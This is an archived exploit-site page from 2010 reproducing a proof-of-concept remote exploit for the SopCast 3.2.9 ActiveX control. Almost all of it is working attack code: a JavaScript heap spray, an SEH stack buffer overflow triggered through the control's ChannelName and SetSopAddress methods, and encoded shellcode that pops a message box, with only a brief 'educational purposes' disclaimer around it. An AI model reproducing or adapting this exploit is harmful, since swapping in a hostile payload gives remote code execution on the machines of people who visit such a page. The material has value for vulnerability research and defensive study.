Home / os / win7

SopCast New 0Day Remote Exploit

Posted on 10 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SopCast New 0Day Remote Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================== SopCast New 0Day Remote Exploit =============================== &lt;html&gt; &lt;Center&gt; &lt;H1&gt;Sopcast POC by Sud0&lt;br&gt;&lt;/H1&gt; &lt;b&gt;Tested on XP SP3 EN on VBox with IE 7&lt;br&gt; Spraying a lot to get a nice unicode usable address 0x20260078&lt;br&gt; I sprayed with a set of P/P/R instructions to come back to the stack&lt;br&gt; ***Need internet connection on the box to trigger the vuln***&lt;br&gt; Wait for the Spray to finish (IE will seem freezed for some seconds)&lt;br&gt; The Sopcast control will be loaded and shown on the page&lt;br&gt; wait approx 3 to 5 seconds and a message box should appear&lt;br&gt; &lt;/b&gt; &lt;/Center&gt; &lt;!-- # Exploit Title : SopCast BOF # Date : August 10, 2010 # Author : Sud0 # Bug found by : Sud0 # Software Link : http://www.sopcast.com - http://www.easetuner.com # Version : 3.2.9 # OS : Windows # Tested on : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7 # Type of vuln : Stack Buffer Overflow - SEH # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-059 # Big thanks to : my wife for supporting me # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Corelan does not want anyone to use this script for malicious and/or illegal purposes Corelan cannot be held responsible for any illegal use. Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. --&gt; &lt;object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' &gt;&lt;/object&gt; &lt;script&gt; // ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack var nops = unescape(&quot;%49%41&quot;); // some nice nops on ECX var ppr = unescape(&quot;%49%58%49%58%49%c3&quot;); // Pop EAX / pop EAX / Ret var ppraddy = 0x20260078; var BlockSize = 0x200000; var BlockHeaderSize = 0x26; var PPRSize = 0x6; var nopSize = BlockSize - (PPRSize + BlockHeaderSize); var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2); var Spray = new Array(); while (nops.length&lt;nopSize) { nops += nops; } nops = nops.substring(0,nopSize); for (i=0;i&lt;heapBlocks;i++) { Spray[i] = nops + ppr; } // ######################################### end of spraying var buffSize = 522; // (516 + 6 = sop:// )offset to overwrite EIP var x=&quot;sop://&quot;; while (x.length&lt;buffSize) x += unescape(&quot;%41&quot;); x+=unescape(&quot;%41&quot;); x+=unescape(&quot;%41&quot;); x+=unescape(&quot;%87&quot;); //low unicode bytes of seh destination address 0035 (0x20260087) x+=&quot;?&quot;; //High unicode bytes of seh destination address 2026 (0x20260087) x+=unescape(&quot;%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49&quot;); x+=unescape(&quot;%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A&quot;); x+=unescape(&quot;%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49&quot;); x+=unescape(&quot;%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3&quot;); // some junk before shellcode for (i=0;i&lt;330;i++) { x+=unescape(&quot;%41&quot;); } // messagebox shellcode x+=&quot;RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA&quot;; x+=&quot;IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP&quot;; x+=&quot;TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw&quot;; x+=&quot;PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML&quot;; x+=&quot;31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK&quot;; x+=&quot;O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO&quot;; x+=&quot;2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN&quot;; x+=&quot;rpSpQqBkOvpNQgPB0ioNuyxkZA&quot;; // some junk after shellcode for (i=0;i&lt;40000;i++) { x+=unescape(&quot;%41&quot;); } // calling the boom boom.ChannelName=x; // setting channel name boom.SetSopAddress(x); // getting address to trigger the boom &lt;/script&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP